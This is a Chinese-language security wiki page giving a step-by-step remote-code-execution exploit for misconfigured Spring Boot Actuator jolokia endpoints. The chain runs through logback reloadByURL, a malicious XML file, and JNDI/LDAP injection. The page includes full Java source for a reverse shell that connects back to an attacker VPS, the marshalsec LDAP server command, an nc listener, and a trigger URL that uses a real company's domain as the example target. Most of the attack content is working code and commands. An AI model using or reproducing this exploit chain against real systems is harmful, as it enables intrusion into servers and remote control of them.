menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 120-Spring Boot chevron_right 007-Spring Boot Actuator jolokia 配置不当导致的rce漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    007-Spring Boot Actuator jolokia 配置不当导致的rce漏洞.md
    5.72 KB / 2021-07-17 00:01:20
        # Spring Boot Actuator jolokia 配置不当导致的rce漏洞
    
    ## 一、漏洞简介
    
    ### 利用条件:
    
    * 目标网站存在 /jolokia 或 /actuator/jolokia 接口
    
    * 目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关 MBean
    
    * 目标可以请求攻击者的 HTTP 服务器(请求可出外网)
    
    * ldap 注入可能会受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1
    
    ### 二、漏洞影响
    
    ### 三、复现过程
    
    **漏洞原理**
    
    * 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 ch.qos.logback.classic.jmx.JMXConfigurator 类的 reloadByURL 方法
    * 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容
    * 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞)
    * xml 文件中利用 logback 依赖的 insertFormJNDI 标签,设置了外部 JNDI 服务器地址
    * 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞
    
    漏洞复现
    
    **步骤一:查看已存在的 MBeans**
    
    访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。
    
    ![](images/2020_06_13/15920615808728.png)
    
    
    ![](images/2020_06_13/15920615851495.png)
    
    
    步骤二:托管 xml 文件
    
    在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443)
    
    
    ```bash
    使用 python 快速开启 http server
    
    python2 -m SimpleHTTPServer 80
    python3 -m http.server 80
    ```
    
    在根目录放置以 xml 结尾的 ian.xml 文件,内容如下:
    
    
    ```xml
    <configuration>
      <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
    </configuration>
    ```
    
    步骤三:准备要执行的 Java 代码
    
    使用兼容低版本 jdk 的方式编译:
    
    
    ```java
    javac -source 1.5 -target 1.5 JNDIObject.java
    ```
    
    然后将生成的 JNDIObject.class 文件拷贝到刚刚用py开启的网站根目录。
    
    ```
    JNDIObject.java //请自行修改代码中反弹shell的ip和端口
    ```
    
    
    ```java
    /**
     *  javac -source 1.5 -target 1.5 JNDIObject.java
     *
     *  Build By LandGrey
     * */
    
    import java.io.File;
    import java.io.InputStream;
    import java.io.OutputStream;
    import java.net.Socket;
    
    public class JNDIObject {
        static {
            try{
                String ip = "your-vps-ip";
                String port = "443";
                String py_path = null;
                String[] cmd;
                if (!System.getProperty("os.name").toLowerCase().contains("windows")) {
                    String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};
                    for(int i = 0; i < py_envs.length; ++i) {
                        String py = py_envs[i];
                        if ((new File(py)).exists()) {
                            py_path = py;
                            break;
                        }
                    }
                    if (py_path != null) {
                        if ((new File("/bin/bash")).exists()) {
                            cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};
                        } else {
                            cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};
                        }
                    } else {
                        if ((new File("/bin/bash")).exists()) {
                            cmd = new String[]{"/bin/bash"};
                        } else {
                            cmd = new String[]{"/bin/sh"};
                        }
                    }
                } else {
                    cmd = new String[]{"cmd.exe"};
                }
                Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();
                Socket s = new Socket(ip, Integer.parseInt(port));
                InputStream pi = p.getInputStream();
                InputStream pe = p.getErrorStream();
                InputStream si = s.getInputStream();
                OutputStream po = p.getOutputStream();
                OutputStream so = s.getOutputStream();
                while(!s.isClosed()) {
                    while(pi.available() > 0) {
                        so.write(pi.read());
                    }
                    while(pe.available() > 0) {
                        so.write(pe.read());
                    }
                    while(si.available() > 0) {
                        po.write(si.read());
                    }
                    so.flush();
                    po.flush();
                    Thread.sleep(50L);
                    try {
                        p.exitValue();
                        break;
                    } catch (Exception e) {
                    }
                }
                p.destroy();
                s.close();
            }catch (Throwable e){
                e.printStackTrace();
            }
        }
    }
    ```
    
    ![](images/2020_06_13/15920616414347.png)
    
    
    步骤四:架设恶意 ldap 服务
    
    下载 marshalsec ,使用下面命令架设对应的 ldap 服务:
    
    
    ```bash
    https://github.com/ianxtianxt/marshalsec
    ```
    
    ps:我这里发的是源码,需要用mvn编译marshalsec
    
    
    ```bash
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389
    ```
    
    步骤五:监听反弹 shell 的端口
    
    
    ```bash
    nc -lvvp 你上一步代码里设置的端口
    ```
    
    步骤六:从外部 URL 地址加载日志配置文件
    
    如果目标成功请求了ian.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。
    
    替换实际的 your-vps-ip 地址访问 URL 触发漏洞:
    
    
    ```bash
    https://www.baidu.com/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/ian.xml
    ```
    
    服务器请求日志
    
    ![](images/2020_06_13/15920617026638.png)
    
    
    ![](images/2020_06_13/15920617060582.png)
    
    
    links
    file_download